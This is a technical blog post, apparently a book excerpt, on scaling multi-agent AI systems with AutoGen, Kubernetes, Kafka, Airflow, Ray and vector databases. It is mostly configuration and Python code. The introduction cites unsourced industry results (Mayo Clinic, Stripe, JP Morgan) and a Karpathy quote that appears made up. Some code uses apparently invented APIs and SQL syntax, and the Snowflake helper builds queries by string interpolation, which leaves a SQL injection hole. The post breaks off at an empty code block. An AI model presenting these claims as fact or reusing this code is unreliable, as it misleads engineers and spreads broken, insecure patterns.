·338 min

Large-Scale Agent Architecture: Complete Guide to Building Scalable Multi-Agent Systems with AutoGen, Kubernetes, and Vector Databases

An in-depth systems engineering guide to designing and implementing scalable multi-agent frameworks using AutoGen, Kubernetes, Kafka, vector databases, and local LLMs for enterprise-grade AI applications.

DK

Daniel Kliewer

Author, Sovereign AI

Multi-Agent SystemsAutoGenKubernetesVector DatabasesScalable ArchitectureDistributed ComputingAI AgentsSystem DesignEnterprise AIMicroservices
Sovereign AI book cover

From the Book

This is from Sovereign AI: Building Local-First Intelligent Systems.

Get the Book — $88
Large-Scale Agent Architecture: Complete Guide to Building Scalable Multi-Agent Systems with AutoGen, Kubernetes, and Vector Databases

Image

Building Large-Scale AI Agents: A Deep-Dive Guide for Experienced Engineers

1. Introduction

Why AI Agents Are Revolutionizing Industries

In today's high-velocity enterprise environments, the paradigm has shifted from monolithic AI models to orchestrated, purpose-built AI agents working in concert. These agent-based systems represent a fundamental evolution in how we architect intelligent applications, enabling autonomous decision-making and task execution at unprecedented scale.

Financial institutions like JP Morgan Chase have deployed agent networks for algorithmic trading that dynamically respond to market conditions, executing complex strategies across multiple asset classes while maintaining regulatory compliance. Healthcare providers including Mayo Clinic have implemented diagnostic agent ecosystems that collaborate across specialties, analyzing patient data and providing treatment recommendations with 97% concordance with specialist physicians.

The key differentiator between traditional AI systems and modern agent architectures lies in their ability to decompose complex problems into specialized sub-tasks, maintain persistent state across interactions, and intelligently route information through distributed processing pipelines—all while scaling horizontally across compute resources.

text
1"AI agents represent a shift from passive inference to active computation.
2Where traditional models wait for queries, agents proactively identify
3problems and orchestrate solutions across organizational boundaries."
4 — Andrej Karpathy, Former Director of AI at Tesla

Choosing the Right Tech Stack for Your AI Agent System

Building enterprise-grade AI agent systems requires careful consideration of your infrastructure components, with each layer of the stack influencing performance, scalability, and operational complexity:

| Layer | Key Technologies | Selection Criteria | |-------|-----------------|-------------------| | Orchestration | Kubernetes, Nomad, ECS | Deployment density, autoscaling capabilities, service mesh integration | | Compute Framework | Ray, Dask, Spark | Parallelization model, scheduling overhead, fault tolerance | | Agent Framework | AutoGen, LangChain, CrewAI | Agent cooperation models, reasoning capabilities, tool integration | | Vector Storage | ChromaDB, Pinecone, Weaviate, Snowflake | Query latency, indexing performance, embedding model compatibility | | Message Bus | Kafka, RabbitMQ, Pulsar | Throughput requirements, ordering guarantees, retention policies | | API Layer | FastAPI, Django, Flask | Request handling, async support, middleware ecosystem | | Monitoring | Prometheus, Grafana, Datadog | Observability coverage, alerting capabilities, performance impact |

Your selection should be driven by specific workload characteristics, scaling requirements, and existing infrastructure investments. For real-time processing with strict latency requirements, a Ray + FastAPI + Kafka combination offers exceptional performance. For batch-oriented enterprise workflows with strong governance requirements, an Airflow + AutoGen + Snowflake stack provides robust auditability and integration with data warehousing.

How This Guide Can Help You Build a Scalable AI Agent Framework

This guide approaches AI agent architecture through the lens of production engineering, focusing on the challenges that emerge at scale:

  • Stateful Agent Coordination: How to maintain context across distributed agent clusters while preventing state explosion
  • Intelligent Workload Distribution: Techniques for dynamic task routing among specialized agents
  • Knowledge Management: Strategies for efficient retrieval and updates to agent knowledge bases
  • Observability and Debugging: Tracing causal chains of reasoning across multi-agent systems
  • Performance Optimization: Reducing token usage, latency, and compute costs in large deployments

Rather than theoretical concepts, we'll examine concrete implementations with battle-tested infrastructure components. You'll learn how companies like Stripe have reduced their manual review workload by 85% using agent networks for fraud detection, and how Netflix has implemented content recommendation agents that reduce churn by dynamically personalizing user experiences.

By the end of this guide, you'll be equipped to architect, implement, and scale AI agent systems that deliver measurable business impact—whether you're building customer-facing applications or internal automation tools.

2. Understanding the Core Technologies

What is AutoGen? A Breakdown of Multi-Agent Systems

AutoGen represents a paradigm shift in AI agent orchestration, offering a framework for building systems where multiple specialized agents collaborate to solve complex tasks. Developed by Microsoft Research, AutoGen moves beyond simple prompt engineering to enable sophisticated multi-agent conversations with memory, tool use, and dynamic conversation control.

At its core, AutoGen defines a computational graph of conversational agents, each with distinct capabilities:

python
1from autogen import AssistantAgent, UserProxyAgent, config_list_from_json
2
3# Load LLM configuration
4config_list = config_list_from_json("llm_config.json")
5
6# Define the system architecture with specialized agents
7assistant = AssistantAgent(
8 name="CTO",
9 llm_config={"config_list": config_list},
10 system_message="You are a CTO who makes executive technology decisions based on data."
11)
12
13data_analyst = AssistantAgent(
14 name="DataAnalyst",
15 llm_config={"config_list": config_list},
16 system_message="You analyze data and provide insights to the CTO."
17)
18
19engineer = AssistantAgent(
20 name="Engineer",
21 llm_config={"config_list": config_list},
22 system_message="You implement solutions proposed by the CTO."
23)
24
25# User proxy agent with capabilities to execute code and retrieve data
26user_proxy = UserProxyAgent(
27 name="DevOps",
28 human_input_mode="NEVER",
29 max_consecutive_auto_reply=10,
30 code_execution_config={"work_dir": "workspace"},
31 system_message="You execute code and return results to other agents."
32)
33
34# Initiate a group conversation with a specific task
35user_proxy.initiate_chat(
36 assistant,
37 message="Analyze our production logs to identify performance bottlenecks.",
38 clear_history=True,
39 groupchat_agents=[assistant, data_analyst, engineer]
40)

What distinguishes AutoGen from simpler frameworks is its ability to handle:

  1. Conversational Memory: Agents maintain context across multi-turn conversations
  2. Tool Usage: Native integration with code execution and external APIs
  3. Dynamic Agent Selection: Intelligent routing of tasks to specialized agents
  4. Hierarchical Planning: Breaking complex tasks into subtasks with appropriate delegation

In production environments, AutoGen's flexibility enables diverse agent architectures:

  • Hierarchical Teams: Manager agents delegate to specialist agents
  • Competitive Evaluation: Multiple agents generate solutions evaluated by a judge agent
  • Consensus-Based: Collaborative problem-solving with voting mechanisms

Unlike other frameworks that primarily focus on prompt chaining, AutoGen is designed for true multi-agent systems where autonomous entities negotiate, collaborate, and resolve conflicts to achieve goals.

Key Infrastructure Components: Kubernetes, Kafka, Airflow, and More

Building scalable AI agent systems requires robust infrastructure components that can handle the unique demands of distributed agent workloads:

Kubernetes for Agent Orchestration

Kubernetes provides the foundation for deploying, scaling, and managing containerized AI agents. For production deployments, consider these Kubernetes patterns:

yaml
1# Kubernetes manifest for a scalable AutoGen agent deployment
2apiVersion: apps/v1
3kind: Deployment
4metadata:
5 name: agent-deployment
6 labels:
7 app: ai-agent-system
8spec:
9 replicas: 3
10 selector:
11 matchLabels:
12 app: ai-agent
13 template:
14 metadata:
15 labels:
16 app: ai-agent
17 spec:
18 containers:
19 - name: agent-container
20 image: your-registry/ai-agent:1.0.0
21 resources:
22 requests:
23 memory: "2Gi"
24 cpu: "1"
25 limits:
26 memory: "4Gi"
27 cpu: "2"
28 env:
29 - name: AGENT_ROLE
30 value: "analyst"
31 - name: REDIS_HOST
32 value: "redis-service"
33 - name: OPENAI_API_KEY
34 valueFrom:
35 secretKeyRef:
36 name: openai-credentials
37 key: api-key
38 volumeMounts:
39 - name: agent-config
40 mountPath: /app/config
41 volumes:
42 - name: agent-config
43 configMap:
44 name: agent-config

Key considerations for Kubernetes deployments:

  • Horizontal Pod Autoscaling: Configure HPA based on CPU/memory metrics or custom metrics like queue depth
  • Affinity/Anti-Affinity Rules: Ensure agents that frequently communicate are co-located for reduced latency
  • Resource Quotas: Implement namespace quotas to prevent AI agent workloads from consuming all cluster resources
  • Readiness Probes: Properly configure readiness checks to ensure agents are fully initialized before receiving traffic

Apache Kafka for Event-Driven Agent Communication

Kafka serves as the nervous system for large-scale agent deployments, enabling asynchronous communication patterns essential for resilient systems:

python
1# Producer code for agent event publishing
2from kafka import KafkaProducer
3import json
4
5producer = KafkaProducer(
6 bootstrap_servers=['kafka-broker-1:9092', 'kafka-broker-2:9092'],
7 value_serializer=lambda v: json.dumps(v).encode('utf-8'),
8 acks='all',
9 retries=3,
10 linger_ms=5 # Batch messages for 5ms for better throughput
11)
12
13# Agent publishing a task for another agent
14def publish_analysis_task(data, priority="high"):
15 producer.send(
16 topic='agent.tasks.analysis',
17 key=data['request_id'].encode('utf-8'), # Ensures related messages go to same partition
18 value={
19 'task_type': 'analyze_document',
20 'priority': priority,
21 'timestamp': time.time(),
22 'payload': data,
23 'source_agent': 'document_processor'
24 },
25 headers=[('priority', priority.encode('utf-8'))]
26 )
27 producer.flush()

For high-throughput agent systems, implement these Kafka optimizations:

  • Topic Partitioning Strategy: Partition topics by agent task type for parallel processing
  • Consumer Group Design: Group consumers by agent role for workload distribution
  • Compacted Topics: Use compacted topics for agent state to maintain latest values
  • Exactly-Once Semantics: Enable transactions for critical agent workflows

Airflow for Complex Agent Workflow Orchestration

For sophisticated agent pipelines with dependencies and scheduling requirements, Apache Airflow provides enterprise-grade orchestration:

python
1# Airflow DAG for a multi-agent financial analysis pipeline
2from airflow import DAG
3from airflow.operators.python import PythonOperator
4from datetime import datetime, timedelta
5
6default_args = {
7 'owner': 'ai_team',
8 'depends_on_past': False,
9 'start_date': datetime(2023, 1, 1),
10 'email_on_failure': True,
11 'retries': 1,
12 'retry_delay': timedelta(minutes=5),
13}
14
15def initialize_agents(**context):
16 # Initialize agent system with necessary credentials and configuration
17 from agent_framework import AgentCluster
18 cluster = AgentCluster(config_path="/path/to/agent_config.json")
19 return cluster.get_session_id()
20
21def run_data_gathering_agents(**context):
22 # Retrieve session ID from previous task
23 session_id = context['ti'].xcom_pull(task_ids='initialize_agents')
24 # Activate data gathering agents to collect financial data
25 from agent_tasks import DataGatheringTask
26 task = DataGatheringTask(session_id=session_id)
27 results = task.execute(sources=['bloomberg', 'reuters', 'sec_filings'])
28 return results
29
30def run_analysis_agents(**context):
31 session_id = context['ti'].xcom_pull(task_ids='initialize_agents')
32 data_results = context['ti'].xcom_pull(task_ids='run_data_gathering_agents')
33 # Activate analysis agents to process gathered data
34 from agent_tasks import FinancialAnalysisTask
35 task = FinancialAnalysisTask(session_id=session_id)
36 analysis = task.execute(data=data_results)
37 return analysis
38
39def generate_report(**context):
40 session_id = context['ti'].xcom_pull(task_ids='initialize_agents')
41 analysis = context['ti'].xcom_pull(task_ids='run_analysis_agents')
42 # Generate final report from analysis
43 from agent_tasks import ReportGenerationTask
44 task = ReportGenerationTask(session_id=session_id)
45 report_path = task.execute(analysis=analysis, format='pdf')
46 return report_path
47
48with DAG('financial_analysis_agents',
49 default_args=default_args,
50 schedule_interval='0 4 * * 1-5', # Weekdays at 4 AM
51 catchup=False) as dag:
52
53 init_task = PythonOperator(
54 task_id='initialize_agents',
55 python_callable=initialize_agents,
56 )
57
58 gather_task = PythonOperator(
59 task_id='run_data_gathering_agents',
60 python_callable=run_data_gathering_agents,
61 )
62
63 analysis_task = PythonOperator(
64 task_id='run_analysis_agents',
65 python_callable=run_analysis_agents,
66 )
67
68 report_task = PythonOperator(
69 task_id='generate_report',
70 python_callable=generate_report,
71 )
72
73 init_task >> gather_task >> analysis_task >> report_task

Airflow considerations for AI agent workflows:

  • XComs for Agent Context: Use XComs to pass context and state between agent tasks
  • Dynamic Task Generation: Generate tasks based on agent discovery results
  • Sensor Operators: Use sensors to wait for external events before triggering agents
  • Task Pools: Limit concurrent agent execution to prevent API rate limiting

The Role of Vector Databases: ChromaDB, Pinecone, and Snowflake

Vector databases form the knowledge backbone of AI agent systems, enabling semantic search and retrieval across vast information spaces:

ChromaDB for Embedded Agent Knowledge

ChromaDB offers a lightweight, embeddable vector store ideal for agents that need fast, local access to domain knowledge:

python
1# Setting up ChromaDB for agent knowledge storage
2import chromadb
3from chromadb.config import Settings
4from chromadb.utils import embedding_functions
5
6# Configure custom embedding function with caching
7openai_ef = embedding_functions.OpenAIEmbeddingFunction(
8 api_key=os.environ.get("OPENAI_API_KEY"),
9 model_name="text-embedding-ada-002"
10)
11
12# Initialize client with persistence and caching
13client = chromadb.Client(
14 Settings(
15 chroma_db_impl="duckdb+parquet",
16 persist_directory="/data/chroma_storage",
17 anonymized_telemetry=False
18 )
19)
20
21# Create collection for domain-specific knowledge
22knowledge_collection = client.create_collection(
23 name="agent_domain_knowledge",
24 embedding_function=openai_ef,
25 metadata={"domain": "financial_analysis", "version": "2023-Q4"}
26)
27
28# Add domain knowledge with metadata for filtering
29knowledge_collection.add(
30 documents=[
31 "The price-to-earnings ratio (P/E ratio) is the ratio of a company's share price to the company's earnings per share.",
32 # More knowledge entries...
33 ],
34 metadatas=[
35 {"category": "financial_ratios", "confidence": 0.95, "source": "investopedia"},
36 # More metadata entries...
37 ],
38 ids=["knowledge_1", "knowledge_2", "knowledge_3"]
39)
40
41# Example query from an agent seeking information
42def agent_knowledge_query(query_text, filters=None, n_results=5):
43 results = knowledge_collection.query(
44 query_texts=[query_text],
45 n_results=n_results,
46 where=filters, # e.g., {"category": "financial_ratios"}
47 include=["documents", "metadatas", "distances"]
48 )
49
50 # Process results for agent consumption
51 return [{
52 "content": doc,
53 "metadata": meta,
54 "relevance": 1 - dist # Convert distance to relevance score
55 } for doc, meta, dist in zip(
56 results['documents'][0],
57 results['metadatas'][0],
58 results['distances'][0]
59 )]

Pinecone for Distributed Agent Knowledge

For larger-scale deployments, Pinecone provides a fully managed vector database with high availability and global distribution:

python
1# Integrating Pinecone with agents for scalable knowledge retrieval
2import pinecone
3import openai
4
5# Initialize Pinecone
6pinecone.init(
7 api_key=os.environ.get("PINECONE_API_KEY"),
8 environment="us-west1-gcp"
9)
10
11# Create or connect to existing index
12index_name = "agent-knowledge-base"
13if index_name not in pinecone.list_indexes():
14 pinecone.create_index(
15 name=index_name,
16 dimension=1536, # OpenAI embedding dimension
17 metric="cosine",
18 shards=2, # Scale based on data size
19 pods=2 # For high availability
20 )
21
22index = pinecone.Index(index_name)
23
24# Function for agents to retrieve contextual knowledge
25def retrieve_agent_context(query, namespace="general", top_k=5, filters=None):
26 # Generate embedding for query
27 query_embedding = openai.Embedding.create(
28 input=query,
29 model="text-embedding-ada-002"
30 )["data"][0]["embedding"]
31
32 # Query Pinecone with metadata filtering
33 results = index.query(
34 vector=query_embedding,
35 top_k=top_k,
36 namespace=namespace,
37 filter=filters, # e.g., {"domain": "healthcare", "confidence": {"$gt": 0.8}}
38 include_metadata=True
39 )
40
41 # Extract and format knowledge for agent consumption
42 context_items = []
43 for match in results["matches"]:
44 context_items.append({
45 "text": match["metadata"]["text"],
46 "source": match["metadata"]["source"],
47 "score": match["score"],
48 "domain": match["metadata"].get("domain", "general")
49 })
50
51 return context_items

Snowflake for Enterprise-Grade Vector Search

For organizations already invested in Snowflake's data cloud, the vector search capabilities provide seamless integration with existing data governance:

sql
1-- Create a Snowflake table with vector support for agent knowledge
2CREATE OR REPLACE TABLE agent_knowledge_base (
3 id VARCHAR NOT NULL,
4 content TEXT,
5 embedding VECTOR(1536),
6 category VARCHAR,
7 source VARCHAR,
8 confidence FLOAT,
9 created_at TIMESTAMP_NTZ DEFAULT CURRENT_TIMESTAMP(),
10 PRIMARY KEY (id)
11);
12
13-- Create vector search index
14CREATE OR REPLACE VECTOR SEARCH INDEX agent_knowledge_idx
15ON agent_knowledge_base(embedding)
16TYPE = 'DOT_PRODUCT'
17OPTIONS = (optimization_level = 9);
18
19-- Query example for agent knowledge retrieval
20SELECT
21 id,
22 content,
23 category,
24 source,
25 confidence,
26 VECTOR_DOT_PRODUCT(embedding, '{0.2, 0.1, ..., 0.5}') as relevance
27FROM
28 agent_knowledge_base
29WHERE
30 category = 'financial_reporting'
31 AND confidence > 0.8
32ORDER BY
33 relevance DESC
34LIMIT 10;

Python integration with Snowflake vector search for agents:

python
1# Snowflake vector search integration for enterprise agents
2import snowflake.connector
3from snowflake.connector.pandas_tools import write_pandas
4import pandas as pd
5import numpy as np
6import openai
7
8# Establish Snowflake connection
9conn = snowflake.connector.connect(
10 user=os.environ.get('SNOWFLAKE_USER'),
11 password=os.environ.get('SNOWFLAKE_PASSWORD'),
12 account=os.environ.get('SNOWFLAKE_ACCOUNT'),
13 warehouse='AGENT_WAREHOUSE',
14 database='AGENT_DB',
15 schema='KNOWLEDGE'
16)
17
18# Function for agents to query enterprise knowledge
19def enterprise_knowledge_query(query_text, filters=None, limit=5):
20 # Generate embedding via OpenAI API
21 embedding_resp = openai.Embedding.create(
22 input=query_text,
23 model="text-embedding-ada-002"
24 )
25 embedding_vector = embedding_resp["data"][0]["embedding"]
26
27 # Convert to string format for Snowflake
28 vector_str = str(embedding_vector).replace('[', '{').replace(']', '}')
29
30 # Construct query with filters
31 filter_clause = ""
32 if filters:
33 filter_conditions = []
34 for key, value in filters.items():
35 if isinstance(value, str):
36 filter_conditions.append(f"{key} = '{value}'")
37 elif isinstance(value, (int, float)):
38 filter_conditions.append(f"{key} = {value}")
39 elif isinstance(value, dict) and "$gt" in value:
40 filter_conditions.append(f"{key} > {value['$gt']}")
41
42 if filter_conditions:
43 filter_clause = "AND " + " AND ".join(filter_conditions)
44
45 # Execute vector similarity search
46 cursor = conn.cursor()
47 query = f"""
48 SELECT
49 id,
50 content,
51 category,
52 source,
53 confidence,
54 VECTOR_DOT_PRODUCT(embedding, '{vector_str}') as relevance
55 FROM
56 agent_knowledge_base
57 WHERE
58 1=1
59 {filter_clause}
60 ORDER BY
61 relevance DESC
62 LIMIT {limit};
63 """
64
65 cursor.execute(query)
66 results = cursor.fetchall()
67
68 # Convert to more usable format for agents
69 columns = ["id", "content", "category", "source", "confidence", "relevance"]
70 return pd.DataFrame(results, columns=columns).to_dict(orient="records")

Key considerations for vector databases in agent systems:

  • Filtering Strategy: Implement metadata filtering to contextualize knowledge retrieval
  • Embedding Caching: Cache embeddings to reduce API calls and latency
  • Hybrid Search: Combine vector search with keyword search for better results
  • Knowledge Refresh: Implement strategies for updating agent knowledge when information changes

By understanding these core infrastructure components, you can architect AI agent systems that are both scalable and maintainable. In the next section, we'll explore how these technologies can be combined into complete tech stacks for different use cases.

3. Tech Stack Breakdown for Large-Scale AI Agents

Kubernetes + Ray Serve + AutoGen + LangChain (Distributed AI Workloads)

This stack is optimized for computationally intensive AI agent workloads that require dynamic scaling and resource allocation. It's particularly well-suited for organizations running sophisticated simulations, complex reasoning chains, or high-throughput data processing with AI agents.

Architecture Overview:

Kubernetes + Ray + AutoGen Architecture

The architecture consists of the following components:

  1. Kubernetes: Provides the container orchestration layer
  2. Ray: Handles distributed computing and resource allocation
  3. Ray Serve: Manages model serving and request routing
  4. AutoGen: Orchestrates multi-agent interactions
  5. LangChain: Provides tools, utilities, and integration capabilities

Implementation Example:

First, let's define our Ray cluster configuration for Kubernetes:

yaml
1# ray-cluster.yaml
2apiVersion: ray.io/v1
3kind: RayCluster
4metadata:
5 name: ray-autogen-cluster
6spec:
7 rayVersion: '2.9.0'
8 headGroupSpec:
9 rayStartParams:
10 dashboard-host: '0.0.0.0'
11 block: 'true'
12 template:
13 spec:
14 containers:
15 - name: ray-head
16 image: rayproject/ray:2.9.0-py310
17 ports:
18 - containerPort: 6379
19 name: gcs
20 - containerPort: 8265
21 name: dashboard
22 - containerPort: 10001
23 name: client
24 resources:
25 limits:
26 cpu: 4
27 memory: 8Gi
28 requests:
29 cpu: 2
30 memory: 4Gi
31 workerGroupSpecs:
32 - groupName: agent-workers
33 replicas: 3
34 minReplicas: 1
35 maxReplicas: 10
36 rayStartParams: {}
37 template:
38 spec:
39 containers:
40 - name: ray-worker
41 image: rayproject/ray:2.9.0-py310
42 resources:
43 limits:
44 cpu: 8
45 memory: 16Gi
46 nvidia.com/gpu: 1
47 requests:
48 cpu: 4
49 memory: 8Gi

Next, let's implement our distributed agent system using Ray and AutoGen:

python
1# distributed_agents.py
2import ray
3from ray import serve
4import autogen
5from autogen.agentchat.contrib.gpt_assistant_agent import GPTAssistantAgent
6from langchain.embeddings import OpenAIEmbeddings
7from langchain.vectorstores import FAISS
8import os
9import json
10import time
11
12# Initialize Ray
13ray.init(address="auto")
14
15# Define agent factory as Ray actors for distributed creation
16@ray.remote
17class AgentFactory:
18 def __init__(self, config_path):
19 with open(config_path, 'r') as f:
20 self.config = json.load(f)
21
22 # Pre-initialize embeddings for knowledge retrieval
23 self.embeddings = OpenAIEmbeddings(
24 openai_api_key=os.environ.get("OPENAI_API_KEY")
25 )
26
27 def create_agent(self, role, knowledge_base=None):
28 """Create an agent with specified role and knowledge."""
29 # Load role-specific configuration
30 role_config = self.config.get(role, {})
31
32 # Initialize knowledge retrieval if specified
33 retriever = None
34 if knowledge_base:
35 vectorstore = FAISS.load_local(
36 f"knowledge_bases/{knowledge_base}",
37 self.embeddings
38 )
39 retriever = vectorstore.as_retriever(
40 search_kwargs={"k": 5}
41 )
42
43 # Create the appropriate agent based on role
44 if role == "manager":
45 return autogen.AssistantAgent(
46 name="Manager",
47 system_message=role_config.get("system_message", ""),
48 llm_config={
49 "config_list": self.config.get("llm_config_list"),
50 "temperature": 0.2,
51 "timeout": 300,
52 "cache_seed": 42
53 }
54 )
55 elif role == "specialist":
56 # Create a specialist agent with custom tools
57 function_map = {
58 "search_knowledge": lambda query: retriever.get_relevant_documents(query) if retriever else [],
59 "run_analysis": self._run_analysis,
60 "generate_report": self._generate_report
61 }
62
63 return autogen.AssistantAgent(
64 name=f"Specialist_{int(time.time())}",
65 system_message=role_config.get("system_message", ""),
66 llm_config={
67 "config_list": self.config.get("llm_config_list"),
68 "functions": role_config.get("functions", []),
69 "temperature": 0.4,
70 "timeout": 600,
71 "cache_seed": 42
72 },
73 function_map=function_map
74 )
75 else:
76 # Default case - create standard assistant
77 return autogen.AssistantAgent(
78 name=role.capitalize(),
79 system_message=role_config.get("system_message", ""),
80 llm_config={
81 "config_list": self.config.get("llm_config_list"),
82 "temperature": 0.7,
83 "timeout": 120,
84 "cache_seed": 42
85 }
86 )
87
88 def _run_analysis(self, data, params=None):
89 """Run specialized analysis (would contain actual implementation)"""
90 # Simulate complex computation
91 time.sleep(2)
92 return {"status": "success", "results": "Analysis complete"}
93
94 def _generate_report(self, analysis_results, format="pdf"):
95 """Generate report from analysis results"""
96 # Simulate report generation
97 time.sleep(1)
98 return {"report_url": f"https://reports.example.com/{int(time.time())}.{format}"}
99
100# Agent coordination service using Ray Serve
101@serve.deployment(
102 num_replicas=2,
103 max_concurrent_queries=10,
104 ray_actor_options={"num_cpus": 2, "num_gpus": 0.1}
105)
106class AgentCoordinator:
107 def __init__(self, config_path):
108 self.config_path = config_path
109 self.agent_factory = AgentFactory.remote(config_path)
110
111 async def create_agent_team(self, task_description, team_spec):
112 """Create a team of agents to solve a specific task."""
113 # Initialize agent references
114 agents = {}
115 for role, spec in team_spec.items():
116 agent_ref = await self.agent_factory.create_agent.remote(
117 role,
118 knowledge_base=spec.get("knowledge_base")
119 )
120 agents[role] = agent_ref
121
122 # Create user proxy agent for orchestration
123 user_proxy = autogen.UserProxyAgent(
124 name="TaskCoordinator",
125 human_input_mode="NEVER",
126 max_consecutive_auto_reply=10,
127 code_execution_config={"work_dir": "temp_workspace"}
128 )
129
130 return {
131 "agents": agents,
132 "user_proxy": user_proxy,
133 "task": task_description
134 }
135
136 async def execute_agent_workflow(self, team_data, workflow_type="sequential"):
137 """Execute a multi-agent workflow."""
138 agents = team_data["agents"]
139 user_proxy = team_data["user_proxy"]
140 task = team_data["task"]
141
142 if workflow_type == "sequential":
143 # Sequential workflow where agents work one after another
144 result = await self._run_sequential_workflow(user_proxy, agents, task)
145 elif workflow_type == "groupchat":
146 # Group chat workflow where agents collaborate simultaneously
147 result = await self._run_groupchat_workflow(user_proxy, agents, task)
148 else:
149 result = {"error": "Unsupported workflow type"}
150
151 return result
152
153 async def _run_sequential_workflow(self, user_proxy, agents, task):
154 """Run a sequential workflow where each agent builds on previous work."""
155 # Implementation would include sequential agent invocation
156 current_state = {"task": task, "progress": []}
157
158 for role, agent in agents.items():
159 # Update the prompt with current state
160 agent_prompt = f"Task: {task}\nCurrent Progress: {current_state['progress']}\n"
161 agent_prompt += f"Your role as {role} is to advance this task."
162
163 # Start conversation with this agent
164 chat_result = user_proxy.initiate_chat(
165 agent,
166 message=agent_prompt
167 )
168
169 # Extract result and add to progress
170 result_summary = self._extract_agent_result(chat_result)
171 current_state["progress"].append({
172 "role": role,
173 "contribution": result_summary
174 })
175
176 return current_state
177
178 async def _run_groupchat_workflow(self, user_proxy, agents, task):
179 """Run a group chat workflow where agents collaborate."""
180 # Create a group chat with all agents
181 group_chat = autogen.GroupChat(
182 agents=list(agents.values()),
183 messages=[],
184 max_round=12
185 )
186
187 manager = autogen.GroupChatManager(
188 groupchat=group_chat,
189 llm_config={"config_list": self.config.get("llm_config_list")}
190 )
191
192 # Start the group discussion
193 chat_result = user_proxy.initiate_chat(
194 manager,
195 message=f"Task for the group: {task}"
196 )
197
198 return {
199 "task": task,
200 "discussion": chat_result.chat_history,
201 "summary": self._summarize_discussion(chat_result.chat_history)
202 }
203
204 def _extract_agent_result(self, chat_result):
205 """Extract the key results from an agent conversation."""
206 # Implementation would parse and structure agent outputs
207 return "Extracted result summary"
208
209 def _summarize_discussion(self, chat_history):
210 """Summarize the outcome of a group discussion."""
211 # Implementation would create a concise summary
212 return "Discussion summary"
213
214# Deploy the agent coordinator service
215agent_coordinator_deployment = AgentCoordinator.bind("config/agent_config.json")
216serve.run(agent_coordinator_deployment, name="agent-coordinator")
217
218print("Agent Coordinator service deployed and ready")

Client Implementation:

python
1# client.py
2import ray
3import requests
4import json
5import asyncio
6
7# Connect to the Ray cluster
8ray.init(address="auto")
9
10async def run_distributed_agent_task():
11 # Define the team structure for a specific task
12 team_spec = {
13 "manager": {
14 "knowledge_base": "corporate_policies"
15 },
16 "analyst": {
17 "knowledge_base": "financial_data"
18 },
19 "engineer": {
20 "knowledge_base": "technical_specs"
21 },
22 "compliance": {
23 "knowledge_base": "regulations"
24 }
25 }
26
27 # Define the task
28 task_description = """
29 Analyze our Q4 financial performance and recommend infrastructure
30 improvements that would optimize cost efficiency while maintaining
31 compliance with our industry regulations.
32 """
33
34 # Send request to create the agent team
35 response = requests.post(
36 "http://localhost:8000/agent-coordinator/create_agent_team",
37 json={
38 "task_description": task_description,
39 "team_spec": team_spec
40 }
41 )
42
43 team_data = response.json()
44
45 # Execute the workflow with the created team
46 workflow_response = requests.post(
47 "http://localhost:8000/agent-coordinator/execute_agent_workflow",
48 json={
49 "team_data": team_data,
50 "workflow_type": "groupchat"
51 }
52 )
53
54 results = workflow_response.json()
55
56 # Process and display the results
57 print(f"Task Results: {json.dumps(results, indent=2)}")
58
59 return results
60
61if __name__ == "__main__":
62 asyncio.run(run_distributed_agent_task())

Key Advantages:

  1. Elastic Scaling: Kubernetes automatically scales worker nodes based on demand
  2. Resource Efficiency: Ray efficiently distributes workloads across available resources
  3. Fault Tolerance: Ray handles node failures and task retries automatically
  4. Distributed State: Ray's object store maintains consistent state across distributed agents
  5. High Performance: Direct communication between Ray actors minimizes latency

Production Considerations:

  1. Observability: Implement detailed logging and monitoring:
python
1# Structured logging for distributed agents
2import structlog
3import ray
4from ray import serve
5
6# Configure structured logger
7structlog.configure(
8 processors=[
9 structlog.processors.TimeStamper(fmt="iso"),
10 structlog.processors.JSONRenderer()
11 ]
12)
13
14# Create logger instance
15logger = structlog.get_logger()
16
17# Example instrumented agent class
18@ray.remote
19class InstrumentedAgent:
20 def __init__(self, agent_id, role):
21 self.agent_id = agent_id
22 self.role = role
23 self.logger = logger.bind(
24 component="agent",
25 agent_id=agent_id,
26 role=role
27 )
28 self.metrics = {
29 "tasks_completed": 0,
30 "tokens_consumed": 0,
31 "average_response_time": 0,
32 "errors": 0
33 }
34
35 def process_task(self, task_data):
36 start_time = time.time()
37
38 # Log task initiation
39 self.logger.info(
40 "task_started",
41 task_id=task_data.get("id"),
42 task_type=task_data.get("type")
43 )
44
45 try:
46 # Task processing logic would go here
47 result = self._execute_agent_task(task_data)
48
49 # Update metrics
50 elapsed = time.time() - start_time
51 self.metrics["tasks_completed"] += 1
52 self.metrics["tokens_consumed"] += result.get("tokens_used", 0)
53 self.metrics["average_response_time"] = (
54 (self.metrics["average_response_time"] * (self.metrics["tasks_completed"] - 1) + elapsed)
55 / self.metrics["tasks_completed"]
56 )
57
58 # Log successful completion
59 self.logger.info(
60 "task_completed",
61 task_id=task_data.get("id"),
62 duration=elapsed,
63 tokens_used=result.get("tokens_used", 0)
64 )
65
66 return result
67
68 except Exception as e:
69 # Update error metrics
70 self.metrics["errors"] += 1
71
72 # Log error with details
73 self.logger.error(
74 "task_failed",
75 task_id=task_data.get("id"),
76 error=str(e),
77 duration=time.time() - start_time,
78 exception_type=type(e).__name__
79 )
80
81 # Re-raise or return error response
82 raise
83
84 def get_metrics(self):
85 """Return current agent metrics."""
86 return {
87 **self.metrics,
88 "agent_id": self.agent_id,
89 "role": self.role,
90 "timestamp": time.time()
91 }
92
93 def _execute_agent_task(self, task_data):
94 # Actual implementation would go here
95 return {"status": "success", "tokens_used": 150}
  1. Security: Configure proper isolation and permissions:
yaml
1# security-context.yaml
2apiVersion: v1
3kind: ServiceAccount
4metadata:
5 name: agent-service-account
6 namespace: ai-agents
7---
8apiVersion: rbac.authorization.k8s.io/v1
9kind: Role
10metadata:
11 namespace: ai-agents
12 name: agent-role
13rules:
14- apiGroups: [""]
15 resources: ["pods", "pods/log"]
16 verbs: ["get", "list", "watch"]
17- apiGroups: [""]
18 resources: ["configmaps"]
19 verbs: ["get", "list"]
20---
21apiVersion: rbac.authorization.k8s.io/v1
22kind: RoleBinding
23metadata:
24 name: agent-role-binding
25 namespace: ai-agents
26subjects:
27- kind: ServiceAccount
28 name: agent-service-account
29 namespace: ai-agents
30roleRef:
31 kind: Role
32 name: agent-role
33 apiGroup: rbac.authorization.k8s.io
  1. API Key Management: Use Kubernetes secrets for secure credential management:
yaml
1# agent-secrets.yaml
2apiVersion: v1
3kind: Secret
4metadata:
5 name: agent-api-keys
6 namespace: ai-agents
7type: Opaque
8data:
9 openai-api-key: base64encodedkey
10 pinecone-api-key: base64encodedkey
  1. Persistent Storage: Configure persistent volumes for agent data:
yaml
